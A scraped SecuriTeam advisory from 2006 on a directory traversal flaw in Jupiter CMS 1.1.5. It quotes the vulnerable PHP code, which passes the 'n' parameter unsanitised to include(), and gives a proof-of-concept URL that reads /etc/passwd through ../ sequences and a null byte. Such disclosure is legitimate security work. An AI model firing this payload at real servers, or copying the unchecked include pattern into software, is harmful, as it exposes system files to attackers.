Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	Jupiter CMS Directory Traversal 2 May 2006    Summary "Jupiter is a content management system." Improper validation of file path allow attackers to include arbitrary files in Jupiter CMS.   Credit: The information has been provided by h e. The original article can be found at: http://www.hamid.ir/security/jupiter.txt Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * Jupiter CMS version 1.1.5 Input passed to the "n" parameter in "index.php" isn't properly verified, before it is used to include files. Vulnerable Code: index.php line 592 //----------------------------------------------------------------- // PHP Navigation //----------------------------------------------------------------- if(!isset($n) && $i != 2 && $i != 17 && $i != "error") include("modules/news.php"); if(isset($n)) {         if(file_exists("$n.php")) include("$n.php");         elseif(!file_exists("$n.php")) header("location: $PHP_SELF?i=error"); } //----------------------------------------------------------------- Proof of Concept: http://localhost/Jupiter/index.php?n=/../../../../../../../../../../etc/passwd%00  Comments:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Krb5 kadmind Denial Of Service vulnerability HP Insight Control for Linux Multiple Vulnerabilities Skype Client for Mac Chat Unicode Denial of Service vulnerability Multiple Sourcefire Products Static Web SSL Keys Vulnerability Samba 3.3.12 Memory Corruption Vulnerability HP-UX Running BIND compromise of NXDOMAIN Responses Ziproxy Multiple Integer Overflow Vulnerabilities KDE KGet Insecure File Operation Vulnerability HP-UX Running BIND compromise of NXDOMAIN Responses Ziproxy Multiple Integer Overflow Vulnerabilities KDE KGet Insecure File Operation Vulnerability HP-UX Running BIND compromise of NXDOMAIN Responses Ziproxy Multiple Integer Overflow Vulnerabilities KDE KGet Insecure File Operation Vulnerability HP-UX Running BIND compromise of NXDOMAIN Responses  Featured Articles Microsoft Windows Media Player Codec Retrieval Dangling Pointer Code Execution Vulnerability HP LaserJet Printers, HP Digital Senders Unauthorized File Access Vulnerability MyBB Password Reset Weak Random Numbers Vulnerability Mozilla Firefox nsTreeSelection Dangling Pointer Code Execution Vulnerability Mozilla Firefox DOM Attribute Cloning Remote Code Execution Oracle Secure Backup Administration $ther Variable Command Injection Code Execution Vulnerability Novell Teaming ajaxUploadImageFile Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®